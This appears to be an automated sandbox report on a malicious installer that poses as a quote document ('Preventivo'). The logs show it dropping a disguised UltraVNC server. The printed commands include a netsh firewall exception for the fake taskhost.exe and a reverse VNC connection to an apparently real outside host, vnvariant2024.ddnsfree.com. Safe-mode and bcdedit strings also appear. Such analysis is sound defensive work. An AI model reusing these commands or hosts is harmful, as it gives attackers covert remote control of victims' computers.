Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini

Jump to behavior

Source: C:\Games\taskhost.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Preventivo24.01.11.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Preventivo24.01.11.exe

Static file information: File size 5955744 > 1048576

Source: Preventivo24.01.11.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00

Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Preventivo24.01.11.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Preventivo24.01.11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr

Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shi6E82.tmp.0.dr

Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00FC0CA0

Source: Preventivo24.01.11.exe	Static PE information: section name: .didat
Source: ddengine.dll.0.dr	Static PE information: section name: .SharedD
Source: shi6E82.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009F6820 pushfd ; iretd	0_3_009F6825
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009F6064 push esp; retf	0_3_009F6069
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A8900 push ebp; ret	0_3_009A8901
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009AA5B8 push eax; ret	0_3_009AA5BA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A8DA4 push ecx; ret	0_3_009A8DB1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00968443 push ds; retf	0_3_00968444
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00963A48 push ecx; ret	0_3_00963A49
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009683CF push ds; retf	0_3_009683D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009705F3 push 00000078h; retf	0_3_009705F5
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h	0_2_00F9A60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108B2DE push ecx; ret	0_2_0108B2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9D5CA push esi; ret	0_2_00E9D5CC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx	0_2_00E9FB11
Source: C:\Games\viewer.exe	Code function: 6_2_006350CC push ecx; ret	6_2_006350DF
Source: C:\Games\viewer.exe	Code function: 6_2_00635676 push ecx; ret	6_2_00635689
Source: C:\Games\taskhost.exe	Code function: 41_2_001E6143 push ecx; ret	41_2_001E6156
Source: C:\Games\taskhost.exe	Code function: 41_2_000A51FF pushad ; iretd	41_2_000A5218
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE25B pushad ; iretd	41_2_000AE25C
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE263 pushad ; iretd	41_2_000AE264
Source: C:\Games\taskhost.exe	Code function: 41_2_000A5265 push 60F5C5F1h; iretd	41_2_000A5278
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE27D pushad ; iretd	41_2_000AE27E
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE275 pushad ; iretd	41_2_000AE276
Source: C:\Games\taskhost.exe	Code function: 41_2_000AC5A6 pushad ; iretd	41_2_000AC5A9
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE5FB pushad ; iretd	41_2_000AE5FC
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE603 pushad ; iretd	41_2_000AE604
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE61D pushad ; iretd	41_2_000AE61E
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE615 pushad ; iretd	41_2_000AE616
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEBB pushad ; iretd	41_2_000ADEBC
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEC3 pushad ; iretd	41_2_000ADEC4
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEDD pushad ; iretd	41_2_000ADEDE
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADED5 pushad ; iretd	41_2_000ADED6

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\shi6E82.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmp	Jump to dropped file

Source: taskhost.exe.0.dr	Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr	Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Games\taskhost.exe	Code function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,	41_2_000CAEE0
